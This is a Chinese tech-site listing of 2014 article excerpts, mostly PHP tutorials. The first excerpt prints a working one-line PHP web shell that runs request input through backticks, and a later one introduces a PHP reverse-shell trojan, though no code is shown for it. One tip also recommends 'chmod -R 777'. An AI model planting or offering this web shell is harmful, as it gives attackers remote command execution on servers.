-
php一句话cmdshell新型 (非一句话木马)
本文为大家讲解了一个新的一句话木马写法:"`"(键盘上~符号的下档键),和python中一样,这个符号中的命令会被php解析器执行,感兴趣的同学参考下. php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); <?php /*一个新型的php一句话cmdshell(非一句话木马) //原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); //局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码; //write by skyfire */ echo `$_REQUEST[id]`; ?> ...
PHP 2014-12-13 05:27:08 -
PHP Header做跳转要注意的几个问题
本文为大家讲解了php下使用header函数在做页面重定向时需要注意的几个问题,感兴趣的同学参考下. 在PHP中用header("location:test.php")进行跳转要注意以下几点,有助于解决一些新手经常遇到的问题 1、location和“:”号间不能有空格,否则会出错。 2、在用header前不能有任何的输出...
PHP 2014-12-13 04:57:03 -
Apache+php+mysql在windows下的安装与配置图解
本文为大家讲解的是windows环境下php+apache+mysql的php运行环境安装和配置方法,感兴趣的同学参考下. 对于php环境的配置图文教材 先准备好软件: Apache官方下载地址:apache_2.0.55-win32-x86-no_ssl.msi,更多版本在这里; php官方下载地址:php-5.0.5-Win32.zip,更多镜像下载地址,更多版本下载; mysql官方下载地址:mysql-4.1.14-win32.zip,更多镜像下载地址,更多版本下载。 一、安装Apache,配置成功一个普通网站服务器 运行下载好的“apache_2.0.55-win32-x86-no_ssl.msi”,出现如下界面: 出现Apache HTTP Server 2.0.55的安装向导界面,点“Next”继续 确认同意软件安装使用许可条例,选择&l...
PHP 2014-12-13 04:33:43 -
php错误: file_put_contents(xxxx) [function.file-put-contents]: failed to open stream: Permission denied in原因及解决方法
PHP 错误: file_put_contents(xxxx) [function.file-put-contents]: failed to open stream: Permission denied in 原因: file_put_contents函数在向指定文件写入数据时权限不足写入失败 解决方法: 修改被写入的文件权限,如果是自动创建的文件,则目录没有权限,需要把目录赋予可写权限 linux下 chmod -R 777 ...
PHP 2014-12-13 03:42:03 -
PHP Warning: include() [function.include]: Failed opening '/xxxx.php' for inclusion (include_path='.:/xxx/xxx/php/lib/php') in xxx.php解决方法
PHP 提示错误: include() [function.include]: Failed opening '/xxxx...
PHP 2014-12-13 03:33:04 -
Vista系统下NTFS和FAT32互相转化方法
这里收集了一些NTFS、FAT32互相转化的方法及常见问题,对Windows Vista系统也是一样适用。 FAT32->NTFS: 在开始——运行中输入CMD ,再输入 convert X:/FS:NTFS(X:是所要转化的分区盘符)在下次系统启动时自动转化...
系统程序 2014-12-13 03:27:06 -
TheVerge软粉编辑默泪:已弃Lumia,转投iPhone6
站长搜索(www.adminso.com):TheVerge软粉编辑默泪:已弃Lumia,转投iPhone6 WP之家讯 微软现在已经将原先在Windows Phone 8.1平台独占的MSN系列应用搬上iOS和安卓平台,现在Windows方面的专家,TheVerge高级编辑,Tom Warren撰文称,已经放弃Windows Phone,转投苹果iPhone6。Tom Warren转移到iPhone6,而不是Android手机,其中的原因可能是iOS与WP8.1系统一些特性更相似,作为过渡,不排除在微软Win10 for Phone(WP10)发布后回归...
业界动态 2014-12-12 20:54:31 -
php addslashes 函数使用说明
本文为大家讲解了php下的addslashes函数的使用方法,及用处,感兴趣的同学参考下. addslashes (PHP 3, PHP 4, PHP 5) addslashes -- 使用反斜线引用字符串 描述 string addslashes ( string str ) 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)...
PHP 2014-12-12 15:00:14 -
php反弹shell实现代码(反弹木马)
本文为大家讲解了一个php实现的反弹shell的示例代码(反弹木马),并简单讲解了他的原理,感兴趣的同学研究学习下. 遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。 非常无 奈,没想 到什么好的办法,后来灵光一闪...
PHP 2014-12-12 12:06:13 -
PHP 类型转换函数intval
本文为大家讲解的是php的类型转换函数intval的使用方法,感兴趣的同学参考下. PHP代码 $id = intval($_GET['id']); 转换id,如果不是数字就直接转换为0,这在防治一些注入攻击时非常有效,也可以让你的程序更加健壮. intval (PHP 3, PHP 4, PHP 5) intval -- 获取变量的整数值 描述 int intval ( mixed var [, int base] ) 通过使用特定的进制转换(默认是十进制),返回变量 var 的 integer 数值。 var 可以是任何标量类型...
PHP 2014-12-12 11:03:16 -
PHP中echo,print_r与var_dump区别分析
本文为大家讲解了PHP中的输出函数echo,print_r与var_dump区别分析,主要讲述了三者的类型本质及其操作数据类型的用法区别,非常具有实用价值,需要的朋友可以参考下 本文较为详细的分析了PHP中echo,print_r与var_dump区别。分享给大家供大家参考...
PHP 2014-12-12 09:53:41 -
linux下apache2.2.4+mysql5.0.77+php5.2.8安装精简
本文为大家讲解了linux下的apache+mysql+php环境的搭建文件,感兴趣的同学参考下. 1...
PHP 2014-12-12 07:12:04
